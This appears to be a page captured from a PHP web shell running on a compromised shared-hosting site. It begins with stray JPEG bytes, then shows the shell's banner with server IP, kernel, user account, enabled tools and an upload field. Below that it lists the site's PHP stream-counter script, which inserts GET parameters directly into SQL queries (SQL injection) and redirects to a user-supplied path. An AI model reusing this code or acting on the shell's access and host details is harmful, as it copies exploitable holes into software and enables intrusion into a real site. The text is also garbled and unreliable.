����JFIF��H�H����Exif��MM�*���� ��3����V�����3������3�(��������������������3�����
Server IP : 162.0.232.25 / Your IP : 18.188.162.87 Web Server : LiteSpeed System : Linux premium276.web-hosting.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64 User : kwacuqig ( 988) PHP Version : 8.2.26 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /home/kwacuqig/redlighttunes.com/ |
Upload File : |
<?php include './php/connect.php'; if(isset($_GET['sid'])){ $sid=$_GET['sid']; $sql = "SELECT `image`,`streams` FROM `singles` WHERE `id`=$sid"; $run = mysqli_query($conn, $sql) or die(mysqli_error($conn)); list($image,$streams) = mysqli_fetch_array($run); //updating streams $increment=++$streams; $sql2="UPDATE `singles` SET `streams`=$increment WHERE `id`=$sid"; if(mysqli_query($conn,$sql2)){ header('location:singles/covers/'.$image); } else { die(mysqli_error($conn)); } } if(isset($_GET['aid'],$_GET['image'])){ $aid=$_GET['aid']; $image=$_GET['image']; $sql = "SELECT `streams` FROM `album_content` WHERE `sid`=$aid"; $run = mysqli_query($conn, $sql) or die(mysqli_error($conn)); list($streams) = mysqli_fetch_array($run); //updating streams $increment=++$streams; $sql2="UPDATE `album_content` SET `streams`=$increment WHERE `sid`=$aid"; if(mysqli_query($conn,$sql2)){ header('location:albums/covers/'.$image); } else { die(mysqli_error($conn)); } } ?>